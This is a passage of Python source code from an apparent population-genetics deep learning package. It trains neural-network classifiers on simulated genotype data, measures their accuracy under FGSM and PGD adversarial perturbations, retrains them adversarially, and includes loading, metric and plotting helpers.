NetworkDir,
ProjectDir,
TrainGenerator,
ValidationGenerator,
TestGenerator,
TrainParams=None,
ValiParams=None,
TestParams=None,
resultsFile=None,
numEpochs=10,
epochSteps=100,
validationSteps=1,
initModel=None,
initWeights=None,
network=None,
nCPU = 1,
gpuID = 0,
attackFraction=0.0,
attackBatchSize=None,
rep=None,
FGSM=False,
PGD=False):
os.environ["CUDA_VISIBLE_DEVICES"]=str(gpuID)
## The following code block appears necessary for running with tf2 and cudnn
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import Session
config = ConfigProto()
config.gpu_options.allow_growth = True
Session(config=config)
###
if(resultsFile == None):
resultsFilename = os.path.basename(trainFile)[:-4] + ".p"
resultsFile = os.path.join("./results/",resultsFilename)
# Store original batch_size for train and vali sets and total numReps
og_train_bs = TrainParams["batchSize"]
tmpDir = TrainParams['treesDirectory']
infoP = pickle.load(open(os.path.join(tmpDir,"info.p"),"rb"))
og_train_numReps = infoP["numReps"]
og_vali_bs = ValiParams["batchSize"]
tmpDir = ValiParams['treesDirectory']
infoP = pickle.load(open(os.path.join(tmpDir,"info.p"),"rb"))
og_vali_numReps = infoP["numReps"]
og_test_bs = TestParams["batchSize"]
og_test_dir = TestParams['treesDirectory']
infoP = pickle.load(open(os.path.join(og_test_dir,"info.p"),"rb"))
og_test_numReps = infoP["numReps"]
# Call the generator
x,y = TrainGenerator.__getitem__(0)
# If TestGenerator is called after model.fit the random shuffling is not the same, even with same seed
x_test,y_test = TestGenerator.__getitem__(0)
img_rows, img_cols = x_test.shape[1], x_test.shape[2]
## define model
model = ModelFuncPointer(x,y)
TimingCB = TimingCallback()
# Early stopping and saving the best weights
callbacks_list = [
EarlyStopping(
monitor='val_loss',
verbose=1,
min_delta=0.01,
patience=25),
ModelCheckpoint(
filepath=network[1],
monitor='val_loss',
save_best_only=True),
TerminateOnNaN(),
TimingCB
]
if initWeights:
print("Loading model/weights from path!")
assert initModel != None
jsonFILE = open(initModel,"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(initWeights)
else:
history = model.fit(TrainGenerator,
epochs=numEpochs,
validation_data=ValidationGenerator,
use_multiprocessing=False,
callbacks=callbacks_list,
verbose=1)
# Write the network
if(network != None):
##serialize model to JSON
model_json = model.to_json()
with open(network[0], "w") as json_file:
json_file.write(model_json)
# Load json and create model
if(network != None):
jsonFILE = open(network[0],"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(network[1])
else:
print("Error: model and weights not loaded")
sys.exit(1)
# Metrics to track the different accuracies.
test_acc_clean = tf.metrics.CategoricalAccuracy()
test_acc_fgsm = tf.metrics.CategoricalAccuracy()
test_acc_pgd = tf.metrics.CategoricalAccuracy()
# predict on clean test examples
print("\nPredicting on clean examples...")
y_pred = model.predict(x_test)
test_acc_clean(y_test, y_pred)
print('test acc on clean examples (%): {:.3f}'.format(test_acc_clean.result() * 100))
if FGSM:
# predict on adversarial test examples using FGSM
print("\nAttacking using Fast Gradient Sign Method...")
fgsm_params = {'eps': 1.0,
'norm': np.inf,
'clip_min': 0.0,
'clip_max': 1.0}
# define the attack generator for test examples
adv_test_params = copy.deepcopy(TestParams)
adv_test_params["model"] = model
adv_test_params["attackName"] = "fgsm"
adv_test_params["attackParams"] = fgsm_params
adv_test_params["attackFraction"] = 1.0
adv_test_params["writeAttacks"] = True
adv_test_params["batchSize"] = attackBatchSize
attackGen_test = SequenceBatchGenerator(**adv_test_params)
# attack the entire test set and write adversarial examples to disk
print("Attacking the test set in batches of %s..."%(attackBatchSize))
num_batches = int(np.ceil(og_test_numReps/float(adv_test_params["batchSize"])))
t0 = time.perf_counter()
for i in range(num_batches):
attackGen_test.__getitem__(i)
progress_bar(i/float(num_batches))
progress_bar(num_batches/float(num_batches))
t1 = time.perf_counter()
print("\nAverage time per FGSM attack (s):", round((t1-t0)/float(og_test_numReps),6))
# reset generator parameters
adv_test_dir = og_test_dir + "_fgsm_rep%s"%(rep)
cmd = "cp %s %s"%(os.path.join(og_test_dir,"info.p"), os.path.join(adv_test_dir,"info.p"))
os.system(cmd)
adv_test_params["treesDirectory"] = adv_test_dir
adv_test_params["attackFraction"] = 0.0
adv_test_params["writeAttacks"] = False
adv_test_params["batchSize"] = og_test_bs
attackGen_test = SequenceBatchGenerator(**adv_test_params)
x_fgsm, y_fgsm = attackGen_test.__getitem__(0)
print("\nPredicting on FGSM examples...")
y_pred_fgsm = model.predict(x_fgsm)
test_acc_fgsm(y_test, y_pred_fgsm)
print('test acc on FGSM adversarial examples (%): {:.3f}'.format(test_acc_fgsm.result() * 100))
if PGD:
# predict on adversarial test examples using PGD
print("\nAttacking using Projected Gradient Descent...")
pgd_params = {'eps': 1.0,
'eps_iter': 1.0,
'nb_iter': 40,
'norm': np.inf,
'clip_min': 0.0,
'clip_max': 1.0,
'sanity_checks': False}
# define the attack generator for test examples
adv_test_params = copy.deepcopy(TestParams)
adv_test_params["model"] = model
adv_test_params["attackName"] = "pgd"
adv_test_params["attackParams"] = pgd_params
adv_test_params["attackFraction"] = 1.0
adv_test_params["writeAttacks"] = True
adv_test_params["batchSize"] = attackBatchSize
attackGen_test = SequenceBatchGenerator(**adv_test_params)
# attack the entire test set and write adversarial examples to disk
print("Attacking the test set in batches of %s..."%(attackBatchSize))
num_batches = int(np.ceil(og_test_numReps/float(adv_test_params["batchSize"])))
t0 = time.perf_counter()
for i in range(num_batches):
attackGen_test.__getitem__(i)
progress_bar(i/float(num_batches))
progress_bar(num_batches/float(num_batches))
t1 = time.perf_counter()
print("\nAverage time per PGD attack (s):", round((t1-t0)/float(og_test_numReps),6))
# reset generator parameters
adv_test_dir = og_test_dir + "_pgd_rep%s"%(rep)
cmd = "cp %s %s"%(os.path.join(og_test_dir,"info.p"), os.path.join(adv_test_dir,"info.p"))
os.system(cmd)
adv_test_params["treesDirectory"] = adv_test_dir
adv_test_params["attackFraction"] = 0.0
adv_test_params["writeAttacks"] = False
adv_test_params["batchSize"] = og_test_bs
attackGen_test = SequenceBatchGenerator(**adv_test_params)
x_pgd, y_pgd = attackGen_test.__getitem__(0)
print("\nPredicting on PGD examples...")
y_pred_pgd = model.predict(x_pgd)
test_acc_pgd(y_test, y_pred_pgd)
print('test acc on PGD adversarial examples (%): {:.3f}'.format(test_acc_pgd.result() * 100))
# Tally results
print("results written to: ",resultsFile)
history.history["fit_time"] = TimingCB.logs
history.history['loss'] = np.array(history.history['loss'])
history.history['val_loss'] = np.array(history.history['val_loss'])
history.history['predictions'] = np.array(y_pred)
if FGSM:
history.history['predictions_fgsm'] = np.array(y_pred_fgsm)
if PGD:
history.history['predictions_pgd'] = np.array(y_pred_pgd)
history.history['Y_test'] = np.array(y_test)
history.history['name'] = ModelName
pickle.dump(history.history, open(resultsFile, "wb" ))
if FGSM or PGD:
# Save genotype images for testset
print("\nSaving adversarial images...")
if rep:
imageDir = os.path.join(ProjectDir,"test_images"+"_rep%s"%(rep))
else:
imageDir = os.path.join(ProjectDir,"test_images")
if not os.path.exists(imageDir):
os.makedirs(imageDir)
for i in range(x_test.shape[0]):
clean_gmFILE = os.path.join(imageDir,"examp{}_clean.npy".format(i))
clean_image = x_test[i]
clean_imageFILE = os.path.join(imageDir,"examp{}_clean.png".format(i))
plt.imsave(clean_imageFILE, clean_image)
if FGSM:
fgsm_gmFILE = os.path.join(imageDir,"examp{}_fgsm.npy".format(i))
fgsm_imageFILE = os.path.join(imageDir,"examp{}_fgsm.png".format(i))
fgsm_delta_imageFILE = os.path.join(imageDir,"examp{}_fgsm_delta.png".format(i))
fgsm_image = x_fgsm[i]
fgsm_delta_image = clean_image - fgsm_image
plt.imsave(fgsm_imageFILE, fgsm_image)
plt.imsave(fgsm_delta_imageFILE, fgsm_delta_image)
if PGD:
pdg_gmFILE = os.path.join(imageDir,"examp{}_pgd.npy".format(i))
pgd_imageFILE = os.path.join(imageDir,"examp{}_pgd.png".format(i))
pgd_delta_imageFILE = os.path.join(imageDir,"examp{}_pgd_delta.png".format(i))
pgd_image = x_pgd[i]
pgd_delta_image = clean_image - pgd_image
plt.imsave(pgd_imageFILE, pgd_image)
plt.imsave(pgd_delta_imageFILE, pgd_delta_image)
progress_bar(i/float(x_test.shape[0]))
progress_bar(x_test.shape[0]/float(x_test.shape[0]))
print("\n")
if FGSM:
########## Adversarial training (FGSM) #############
        ## similar objects to those above, except with the _fgsm / _pgd extensions
        print("Repeating the process, now training on adversarial examples (FGSM)")
# define the attack generator for training examples
adv_train_params = copy.deepcopy(TrainParams)
adv_train_params["model"] = model
adv_train_params["attackName"] = "fgsm"
adv_train_params["attackParams"] = fgsm_params
adv_train_params["attackFraction"] = 1.0
adv_train_params["writeAttacks"] = True
adv_train_params["batchSize"] = attackBatchSize
attackGen_train = SequenceBatchGenerator(**adv_train_params)
# attack the entire training set and write adversarial examples to disk
print("Attacking the training set in batches of %s..."%(attackBatchSize))
num_batches = int(np.ceil(og_train_numReps/float(adv_train_params["batchSize"])))
for i in range(num_batches):
x_train,y_train = attackGen_train.__getitem__(i)
progress_bar(i/float(num_batches))
progress_bar(num_batches/float(num_batches))
# define the attack generator for validation examples
adv_vali_params = copy.deepcopy(ValiParams)
adv_vali_params["model"] = model
adv_vali_params["attackName"] = "fgsm"
adv_vali_params["attackParams"] = fgsm_params
adv_vali_params["attackFraction"] = 1.0
adv_vali_params["writeAttacks"] = True
adv_vali_params["batchSize"] = attackBatchSize
attackGen_vali = SequenceBatchGenerator(**adv_vali_params)
# attack the entire validation set and write adversarial examples to disk
print("\nAttacking the validation set in batches of %s..."%(attackBatchSize))
num_batches = int(np.ceil(og_vali_numReps/float(adv_vali_params["batchSize"])))
for i in range(num_batches):
x_vali,y_vali = attackGen_vali.__getitem__(i)
progress_bar(i/float(num_batches))
progress_bar(num_batches/float(num_batches))
        # reset generator parameters in preparation for model fit
adv_train_params["attackFraction"] = attackFraction
adv_train_params["writeAttacks"] = False
adv_train_params["batchSize"] = og_train_bs
attackGen_train = SequenceBatchGenerator(**adv_train_params)
adv_vali_params["attackFraction"] = attackFraction
adv_vali_params["writeAttacks"] = False
adv_vali_params["batchSize"] = og_vali_bs
attackGen_vali = SequenceBatchGenerator(**adv_vali_params)
## define the new model
print('\n')
model_fgsm = ModelFuncPointer(x_train,y_train)
## Early stopping and saving the best weights
TimingCB = TimingCallback()
callbacks_list_fgsm = [
EarlyStopping(
monitor='val_loss',
verbose=1,
min_delta=0.01,
patience=25),
ModelCheckpoint(
filepath=network[1].replace(".h5","_fgsm.h5"),
monitor='val_loss',
save_best_only=True),
TerminateOnNaN(),
TimingCB
]
# Train the network
history_fgsm = model_fgsm.fit(x=attackGen_train,
epochs=numEpochs,
validation_data=attackGen_vali,
callbacks=callbacks_list_fgsm,
use_multiprocessing=False,
verbose=2)
# Write the network
if(network != None):
##serialize model_fgsm to JSON
model_json_fgsm = model_fgsm.to_json()
with open(network[0].replace(".json","_fgsm.json"), "w") as json_file:
json_file.write(model_json_fgsm)
# Load json and create model
if(network != None):
jsonFILE = open(network[0].replace(".json","_fgsm.json"),"r")
loadedModel_fgsm = jsonFILE.read()
jsonFILE.close()
model_fgsm=model_from_json(loadedModel_fgsm)
model_fgsm.load_weights(network[1].replace(".h5","_fgsm.h5"))
else:
print("Error: model_fgsm and weights_fgsm not loaded")
sys.exit(1)
# Metrics to track the different accuracies.
test_acc_clean_fgsm = tf.metrics.CategoricalAccuracy()
test_acc_fgsm_fgsm = tf.metrics.CategoricalAccuracy()
test_acc_pgd_fgsm = tf.metrics.CategoricalAccuracy()
# predict on clean test examples
print("Predicting on clean examples...")
y_pred_fgsm = model_fgsm.predict(x_test)
test_acc_clean_fgsm(y_test, y_pred_fgsm)
print('test acc on clean examples (%): {:.3f}'.format(test_acc_clean_fgsm.result() * 100))
# predict on adversarial test examples using FGSM
print("Predicting on FGSM examples...")
y_pred_fgsm_fgsm = model_fgsm.predict(x_fgsm)
test_acc_fgsm_fgsm(y_test, y_pred_fgsm_fgsm)
print('test acc on FGSM adversarial examples (%): {:.3f}'.format(test_acc_fgsm_fgsm.result() * 100))
if PGD:
# predict on adversarial test examples using PGD
print("Predicting on PGD examples...")
y_pred_pgd_fgsm = model_fgsm.predict(x_pgd)
test_acc_pgd_fgsm(y_test, y_pred_pgd_fgsm)
print('test acc on PGD adversarial examples (%): {:.3f}'.format(test_acc_pgd_fgsm.result() * 100))
## write results
print("results_fgsm written to: ",resultsFile.replace(".p","_fgsm.p"))
history_fgsm.history["fit_time"] = TimingCB.logs
history_fgsm.history['loss'] = np.array(history_fgsm.history['loss'])
history_fgsm.history['val_loss'] = np.array(history_fgsm.history['val_loss'])
history_fgsm.history['predictions'] = np.array(y_pred_fgsm)
history_fgsm.history['predictions_fgsm'] = np.array(y_pred_fgsm_fgsm)
if PGD:
history_fgsm.history['predictions_pgd'] = np.array(y_pred_pgd_fgsm)
history_fgsm.history['Y_test'] = np.array(y_test)
history_fgsm.history['name'] = ModelName
pickle.dump(history_fgsm.history, open( resultsFile.replace(".p","_fgsm.p"), "wb" ))
if PGD:
########## Adversarial training (PGD) #############
        ## similar objects to those above, except with the _fgsm / _pgd extensions
        print("\nRepeating the process, now training on adversarial examples (PGD)")
# define the attack generator for training examples
adv_train_params = copy.deepcopy(TrainParams)
adv_train_params["model"] = model
adv_train_params["attackName"] = "pgd"
adv_train_params["attackParams"] = pgd_params
adv_train_params["attackFraction"] = 1.0
adv_train_params["writeAttacks"] = True
adv_train_params["batchSize"] = attackBatchSize
attackGen_train = SequenceBatchGenerator(**adv_train_params)
# attack the entire training set and write adversarial examples to disk
print("Attacking the training set in batches of %s..."%(attackBatchSize))
num_batches = int(np.ceil(og_train_numReps/float(adv_train_params["batchSize"])))
for i in range(num_batches):
x_train,y_train = attackGen_train.__getitem__(i)
progress_bar(i/float(num_batches))
# define the attack generator for validation examples
adv_vali_params = copy.deepcopy(ValiParams)
adv_vali_params["model"] = model
adv_vali_params["attackName"] = "pgd"
adv_vali_params["attackParams"] = pgd_params
adv_vali_params["attackFraction"] = 1.0
adv_vali_params["writeAttacks"] = True
adv_vali_params["batchSize"] = attackBatchSize
attackGen_vali = SequenceBatchGenerator(**adv_vali_params)
# attack the entire validation set and write adversarial examples to disk
print("\nAttacking the validation set in batches of %s..."%(attackBatchSize))
num_batches = int(np.ceil(og_vali_numReps/float(adv_vali_params["batchSize"])))
for i in range(num_batches):
x_vali,y_vali = attackGen_vali.__getitem__(i)
progress_bar(i/float(num_batches))
        # reset generator parameters in preparation for model fit
adv_train_params["attackFraction"] = attackFraction
adv_train_params["writeAttacks"] = False
adv_train_params["batchSize"] = og_train_bs
attackGen_train = SequenceBatchGenerator(**adv_train_params)
adv_vali_params["attackFraction"] = attackFraction
adv_vali_params["writeAttacks"] = False
adv_vali_params["batchSize"] = og_vali_bs
attackGen_vali = SequenceBatchGenerator(**adv_vali_params)
## define the new model
print('\n')
model_pgd = ModelFuncPointer(x_train,y_train)
## Early stopping and saving the best weights
TimingCB = TimingCallback()
callbacks_list_pgd = [
EarlyStopping(
monitor='val_loss',
verbose=1,
min_delta=0.01,
patience=25),
ModelCheckpoint(
filepath=network[1].replace(".h5","_pgd.h5"),
monitor='val_loss',
save_best_only=True),
TerminateOnNaN(),
TimingCB
]
# Train the network
history_pgd = model_pgd.fit(x=attackGen_train,
epochs=numEpochs,
validation_data=attackGen_vali,
callbacks=callbacks_list_pgd,
use_multiprocessing=False,
verbose=2)
# Write the network
if(network != None):
##serialize model_pgd to JSON
model_json_pgd = model_pgd.to_json()
with open(network[0].replace(".json","_pgd.json"), "w") as json_file:
json_file.write(model_json_pgd)
# Load json and create model
if(network != None):
jsonFILE = open(network[0].replace(".json","_pgd.json"),"r")
loadedModel_pgd = jsonFILE.read()
jsonFILE.close()
model_pgd=model_from_json(loadedModel_pgd)
model_pgd.load_weights(network[1].replace(".h5","_pgd.h5"))
else:
print("Error: model_pgd and weights_pgd not loaded")
sys.exit(1)
# Metrics to track the different accuracies.
test_acc_clean_pgd = tf.metrics.CategoricalAccuracy()
test_acc_fgsm_pgd = tf.metrics.CategoricalAccuracy()
test_acc_pgd_pgd = tf.metrics.CategoricalAccuracy()
# predict on clean test examples
print("Predicting on clean examples...")
y_pred_pgd = model_pgd.predict(x_test)
test_acc_clean_pgd(y_test, y_pred_pgd)
print('test acc on clean examples (%): {:.3f}'.format(test_acc_clean_pgd.result() * 100))
if FGSM:
# predict on adversarial test examples using FGSM
print("Predicting on FGSM examples...")
y_pred_fgsm_pgd = model_pgd.predict(x_fgsm)
test_acc_fgsm_pgd(y_test, y_pred_fgsm_pgd)
print('test acc on FGSM adversarial examples (%): {:.3f}'.format(test_acc_fgsm_pgd.result() * 100))
# predict on adversarial test examples using PGD
print("Predicting on PGD examples...")
y_pred_pgd_pgd = model_pgd.predict(x_pgd)
test_acc_pgd_pgd(y_test, y_pred_pgd_pgd)
print('test acc on PGD adversarial examples (%): {:.3f}'.format(test_acc_pgd_pgd.result() * 100))
## write results
print("results_pgd written to: ",resultsFile.replace(".p","_pgd.p"))
history_pgd.history["fit_time"] = TimingCB.logs
history_pgd.history['loss'] = np.array(history_pgd.history['loss'])
history_pgd.history['val_loss'] = np.array(history_pgd.history['val_loss'])
history_pgd.history['predictions'] = np.array(y_pred_pgd)
if FGSM:
history_pgd.history['predictions_fgsm'] = np.array(y_pred_fgsm_pgd)
history_pgd.history['predictions_pgd'] = np.array(y_pred_pgd_pgd)
history_pgd.history['Y_test'] = np.array(y_test)
history_pgd.history['name'] = ModelName
pickle.dump(history_pgd.history, open( resultsFile.replace(".p","_pgd.p"), "wb" ))
######### write log ###########
outLog = resultsFile.replace(".p","_log.txt")
with open(outLog, "w") as fOUT:
fOUT.write("Before adversarial training\n")
fOUT.write("===========================\n")
fOUT.write('test acc on clean examples (%): {:.3f}\n'.format(test_acc_clean.result() * 100))
if FGSM:
fOUT.write('test acc on FGSM adversarial examples (%): {:.3f}\n'.format(test_acc_fgsm.result() * 100))
if PGD:
fOUT.write('test acc on PGD adversarial examples (%): {:.3f}\n'.format(test_acc_pgd.result() * 100))
if FGSM:
fOUT.write("After adversarial training (fgsm attack)\n")
fOUT.write("===========================\n")
fOUT.write('test acc on clean examples (%): {:.3f}\n'.format(test_acc_clean_fgsm.result() * 100))
fOUT.write('test acc on FGSM adversarial examples (%): {:.3f}\n'.format(test_acc_fgsm_fgsm.result() * 100))
if PGD:
fOUT.write('test acc on PGD adversarial examples (%): {:.3f}\n'.format(test_acc_pgd_fgsm.result() * 100))
if PGD:
fOUT.write("After adversarial training (pgd attack)\n")
fOUT.write("===========================\n")
fOUT.write('test acc on clean examples (%): {:.3f}\n'.format(test_acc_clean_pgd.result() * 100))
if FGSM:
fOUT.write('test acc on FGSM adversarial examples (%): {:.3f}\n'.format(test_acc_fgsm_pgd.result() * 100))
fOUT.write('test acc on PGD adversarial examples (%): {:.3f}\n'.format(test_acc_pgd_pgd.result() * 100))
return
#-------------------------------------------------------------------------------------------
def predict_cleverhans_tf2(ModelFuncPointer,
ModelName,
NetworkDir,
ProjectDir,
TrainGenerator,
ValidationGenerator,
TestGenerator,
test_info=None,
resultsFile=None,
numEpochs=10,
epochSteps=100,
validationSteps=1,
init=None,
network=None,
nCPU = 1,
gpuID = 0,
paramsID = None,
FGSM=False,
PGD=False,
task=None):
os.environ["CUDA_VISIBLE_DEVICES"]=str(gpuID)
## The following code block appears necessary for running with tf2 and cudnn
from tensorflow.compat.v1 import ConfigProto
from tensorflow.compat.v1 import Session
config = ConfigProto()
config.gpu_options.allow_growth = True
Session(config=config)
###
########### Prediction on non-adversarial trained network #############
# Load json and create model
if(network != None):
jsonFILE = open(network[0],"r")
loadedModel = jsonFILE.read()
jsonFILE.close()
model=model_from_json(loadedModel)
model.load_weights(network[1])
else:
print("Error: model and weights not loaded")
sys.exit(1)
# Metrics to track the different accuracies.
test_acc_clean = tf.metrics.CategoricalAccuracy()
test_acc_fgsm = tf.metrics.CategoricalAccuracy()
test_acc_pgd = tf.metrics.CategoricalAccuracy()
# Read all clean test data into memory
x_test, y_test = TestGenerator.__getitem__(0)
predictions = model.predict(x_test)
#replace predictions and Y_test in results file
history= pickle.load(open(resultsFile, "rb"))
tmp = []
if task == "expansion":
task_key = "gr"
if task == "admixture":
task_key = "m"
for gr in test_info[task_key]:
if gr > 0.0:
tmp.append([0.0,1.0])
else:
tmp.append([1.0,0.0])
history["Y_test"] = np.array(tmp)
history['predictions'] = np.array(predictions)
#rewrite result file
newResultsFile = resultsFile.replace(".p","_params%s.p"%(paramsID))
print("new results written to: ",newResultsFile)
pickle.dump(history, open(newResultsFile, "wb"))
test_acc_clean(y_test, predictions)
if FGSM:
########### Prediction on adversarial trained network (FGSM) #############
# Load json and create model
if(network != None):
jsonFILE = open(network[0].replace(".json","_fgsm.json"),"r")
loadedModel_fgsm = jsonFILE.read()
jsonFILE.close()
model_fgsm=model_from_json(loadedModel_fgsm)
model_fgsm.load_weights(network[1].replace(".h5","_fgsm.h5"))
else:
print("Error: model_fgsm and weights_fgsm not loaded")
sys.exit(1)
predictions_fgsm = model_fgsm.predict(x_test)
# replace predictions and Y_test in results file
history_fgsm = pickle.load(open(resultsFile.replace(".p","_fgsm.p"), "rb"))
tmp = []
for gr in test_info[task_key]:
if gr > 0.0:
tmp.append([0.0,1.0])
else:
tmp.append([1.0,0.0])
history_fgsm["Y_test"] = np.array(tmp)
history_fgsm['predictions'] = np.array(predictions_fgsm)
test_acc_fgsm(y_test, predictions_fgsm)
# rewrite new results file
newResultsFile = resultsFile.replace(".p","_fgsm_params%s.p"%(paramsID))
print("new results written to: ", newResultsFile)
pickle.dump(history_fgsm, open(newResultsFile, "wb"))
if PGD:
########### Prediction on adversarial trained network (PGD) #############
# Load json and create model
if(network != None):
jsonFILE = open(network[0].replace(".json","_pgd.json"),"r")
loadedModel_pgd = jsonFILE.read()
jsonFILE.close()
model_pgd=model_from_json(loadedModel_pgd)
model_pgd.load_weights(network[1].replace(".h5","_pgd.h5"))
else:
print("Error: model_pgd and weights_pgd not loaded")
sys.exit(1)
predictions_pgd = model_pgd.predict(x_test)
# replace predictions and Y_test in results file
history_pgd = pickle.load(open(resultsFile.replace(".p","_pgd.p"), "rb"))
tmp = []
for gr in test_info[task_key]:
if gr > 0.0:
tmp.append([0.0,1.0])
else:
tmp.append([1.0,0.0])
history_pgd["Y_test"] = np.array(tmp)
history_pgd['predictions'] = np.array(predictions_pgd)
test_acc_pgd(y_test, predictions_pgd)
## print results
print('test acc on clean examples (%): {:.3f}'.format(test_acc_clean.result() * 100))
print('test acc on FGSM adversarial examples (%): {:.3f}'.format(test_acc_fgsm.result() * 100))
print('test acc on PGD adversarial examples (%): {:.3f}'.format(test_acc_pgd.result() * 100))
# rewrite new results file
newResultsFile = resultsFile.replace(".p","_pgd_params%s.p"%(paramsID))
print("new results written to: ", newResultsFile)
pickle.dump(history_pgd, open(newResultsFile, "wb"))
######### write log ###########
outLog = resultsFile.replace(".p","_log_params%s.txt"%(paramsID))
with open(outLog, "w") as fOUT:
fOUT.write("Before adversarial training\n")
fOUT.write("===========================\n")
fOUT.write('test acc on test_paramsB examples (%): {:.3f}\n'.format(test_acc_clean.result() * 100))
if FGSM:
fOUT.write("After adversarial training (fgsm attack)\n")
fOUT.write("===========================\n")
fOUT.write('test acc on test_paramsB examples (%): {:.3f}\n'.format(test_acc_fgsm.result() * 100))
if PGD:
fOUT.write("After adversarial training (pgd attack)\n")
fOUT.write("===========================\n")
fOUT.write('test acc on test_paramsB examples (%): {:.3f}\n'.format(test_acc_pgd.result() * 100))
return None
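# Usage sketch (every path, generator and flag below is a placeholder; the real call sites
# live elsewhere in the package):
#   predict_cleverhans_tf2(ModelFuncPointer=my_model_fn, ModelName="CNN", NetworkDir=netDir,
#                          ProjectDir=projDir, TrainGenerator=gen_train,
#                          ValidationGenerator=gen_vali, TestGenerator=gen_test,
#                          test_info=test_info, resultsFile="results.p",
#                          network=["model.json", "weights.h5"],
#                          FGSM=True, PGD=True, paramsID="B", task="expansion")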
#-------------------------------------------------------------------------------------------
def progress_bar(percent, barLen = 50):
sys.stdout.write("\r")
progress = ""
for i in range(barLen):
if i < int(barLen * percent):
progress += "="
else:
progress += " "
sys.stdout.write("[ %s ] %.2f%%" % (progress, percent * 100))
sys.stdout.flush()
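# Illustrative usage (hypothetical loop; `process_batch` is not a real function here):
# progress_bar expects a fraction in [0, 1].
#   for i in range(num_batches):
#       process_batch(i)
#       progress_bar((i + 1) / float(num_batches))
#   print()  # move to a new line once the bar is complete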
#-------------------------------------------------------------------------------------------
def getHapsPosLabels(direc,simulator,shuffle=False):
'''
loops through a trees directory created by the data generator class
and returns the respective genotype matrices, positions, and labels
'''
haps = []
positions = []
infoFilename = os.path.join(direc,"info.p")
infoDict = pickle.load(open(infoFilename,"rb"))
labels = infoDict["y"]
#how many trees files are in this directory.
li = os.listdir(direc)
numReps = len(li) - 1 #minus one for the 'info.p' file
for i in range(numReps):
filename = str(i) + ".trees"
filepath = os.path.join(direc,filename)
treeSequence = msp.load(filepath)
haps.append(treeSequence.genotype_matrix())
positions.append(np.array([s.position for s in treeSequence.sites()]))
haps = np.array(haps)
positions = np.array(positions)
return haps,positions,labels
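# Usage sketch (the directory path is hypothetical; assumes it holds info.p plus
# 0.trees ... N.trees written by the simulator):
#   haps, positions, labels = getHapsPosLabels("project/test", simulator="msprime")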
#-------------------------------------------------------------------------------------------
def sort_min_diff(amat):
'''Takes a SNP matrix with individuals on rows and returns the same matrix with individuals sorted by genetic similarity.
Finding the optimal ordering is NP-hard, so a nearest-neighbors approximation is used; it's not perfect, but it's fast and generally performs well.
Assumes the input matrix is a numpy array.'''
mb = NearestNeighbors(n_neighbors=len(amat), metric='manhattan').fit(amat)
v = mb.kneighbors(amat)
smallest = np.argmin(v[0].sum(axis=1))
return amat[v[1][smallest]]
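# Minimal example (made-up binary SNP matrix with individuals on rows):
#   snps = np.array([[0, 1, 1, 0],
#                    [1, 1, 1, 0],
#                    [0, 0, 1, 1]])
#   sorted_snps = sort_min_diff(snps)  # same rows, reordered by genetic similarity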
#-------------------------------------------------------------------------------------------
def segSitesStats(treesDirec):
'''
DEPRECATED
'''
infoFilename = os.path.join(treesDirec,"info.p")
infoDict = pickle.load(open(infoFilename,"rb"))
newLabels = []
newMaxSegSites = 0
#how many trees files are in this directory.
li = os.listdir(treesDirec)
numReps = len(li) - 1 # minus one for the 'info.p' file
segSites = []
for i in range(numReps):
filename = str(i) + ".trees"
filepath = os.path.join(treesDirec,filename)
treeSequence = msp.load(filepath)
segSites.append(treeSequence.num_sites)
return segSites
#-------------------------------------------------------------------------------------------
def mae(x,y):
'''
Compute mean absolute error between predictions and targets
float[],float[] -> float
'''
assert(len(x) == len(y))
summ = 0.0
length = len(x)
for i in range(length):
summ += abs(x[i] - y[i])
return summ/length
#-------------------------------------------------------------------------------------------
def mse(x,y):
'''
Compute mean squared error between predictions and targets
float[],float[] -> float
'''
assert(len(x) == len(y))
summ = 0.0
length = len(x)
for i in range(length):
summ += (x[i] - y[i])**2
return summ/length
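# Quick sanity check for mae/mse (illustrative numbers only):
#   mae([1.0, 2.0, 3.0], [1.0, 2.5, 2.0])  -> (0.0 + 0.5 + 1.0) / 3 = 0.5
#   mse([1.0, 2.0, 3.0], [1.0, 2.5, 2.0])  -> (0.0 + 0.25 + 1.0) / 3 ≈ 0.4167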
#-------------------------------------------------------------------------------------------
def plotResults(resultsFile,saveas):
'''
Plotting code for evaluating a model on simulated data,
using the pickle file produced by a training run (resultsFile).
Plots the final test-set predictions,
as well as training and validation loss as a function of epoch.
'''
plt.rc('font', family='serif', serif='Times')
plt.rc('xtick', labelsize=6)
plt.rc('ytick', labelsize=6)
plt.rc('axes', labelsize=6)
results = pickle.load(open( resultsFile , "rb" ))
fig,axes = plt.subplots(2,1)
plt.subplots_adjust(hspace=0.5)
predictions = np.array([float(Y) for Y in results["predictions"]])
realValues = np.array([float(X) for X in results["Y_test"]])
r_2 = round((np.corrcoef(predictions,realValues)[0,1])**2,5)
mae_0 = round(mae(realValues,predictions),4)
mse_0 = round(mse(realValues,predictions),4)
labels = "$R^{2} = $"+str(r_2)+"\n"+"$mae = $" + str(mae_0)+" | "+"$mse = $" + str(mse_0)
axes[0].scatter(realValues,predictions,marker = "o", color = 'tab:purple',s=5.0,alpha=0.6)
lims = [
np.min([axes[0].get_xlim(), axes[0].get_ylim()]), # min of both axes
np.max([axes[0].get_xlim(), axes[0].get_ylim()]), # max of both axes
]
axes[0].set_xlim(lims)
axes[0].set_ylim(lims)
axes[0].plot(lims, lims, 'k-', alpha=0.75, zorder=0)
axes[0].set_title(results["name"]+"\n"+labels,fontsize=6)
lossRowIndex = 1
axes[1].plot(results["loss"],label = "mae loss",color='tab:cyan')
axes[1].plot(results["val_loss"], label= "mae validation loss",color='tab:pink')
#axes[1].plot(results["mean_squared_error"],label = "mse loss",color='tab:green')
#axes[1].plot(results["val_mean_squared_error"], label= "mse validation loss",color='tab:olive')
axes[1].legend(frameon = False,fontsize = 6)
axes[1].set_ylabel("mse")
axes[0].set_ylabel(str(len(predictions))+" msprime predictions")
axes[0].set_xlabel(str(len(realValues))+" msprime real values")
fig.subplots_adjust(left=.15, bottom=.16, right=.85, top=.92,hspace = 0.5,wspace=0.4)
height = 7.00
width = 7.00
axes[0].grid()
fig.set_size_inches(height, width)
fig.savefig(saveas)
#-------------------------------------------------------------------------------------------
def plotResultsSigmoid(resultsFile,saveas):
plt.rc('font', family='serif', serif='Times')
plt.rc('xtick', labelsize=6)
plt.rc('ytick', labelsize=6)
plt.rc('axes', labelsize=6)
results = pickle.load(open( resultsFile , "rb" ))
